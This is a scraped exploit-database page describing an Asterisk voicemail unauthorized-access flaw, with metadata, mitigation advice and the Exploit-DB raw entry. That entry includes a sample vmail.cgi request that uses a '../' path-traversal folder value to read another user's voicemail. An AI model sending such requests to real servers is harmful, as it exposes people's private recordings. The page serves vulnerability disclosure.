Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Asterisk Unauthorized Access Vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
Asterisk
by:
Not mentioned
7.5
CVSS
HIGH
Unauthorized Access
287
CWE
Product Name: Asterisk
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:asterisk:asterisk
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Unknown

Asterisk Unauthorized Access Vulnerability

The vulnerability allows an attacker to access a victim user's voicemail and any .wav/.WAV files on the affected system by exploiting a failure in the application's verification of user-supplied input.

Mitigation:

Apply the latest security updates and patches from the vendor. Avoid using default or weak passwords for voicemail accounts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15336/info

Asterisk is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly verify user-supplied input.

Successful exploitation will grant an attacker access to a victim user's voicemail and to any '.wav/.WAV' files currently on the affected system. 

http://www.example.org/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav

Navigation

Suggest Exploit

Services By CQR